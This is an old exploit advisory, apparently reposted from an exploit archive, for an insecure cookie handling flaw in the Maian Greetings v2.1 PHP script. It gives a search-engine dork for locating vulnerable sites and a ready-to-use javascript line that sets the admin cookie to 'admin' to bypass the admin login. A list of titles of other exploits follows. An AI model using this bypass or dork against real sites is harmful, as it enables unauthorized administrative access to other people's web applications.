Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
【Maian Greetings 2.1 Insecure Cookie Handling Vulnerability】相关文章:
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit
★ BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
★ Maian Music 1.0 Insecure Cookie Handling Vulnerability
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC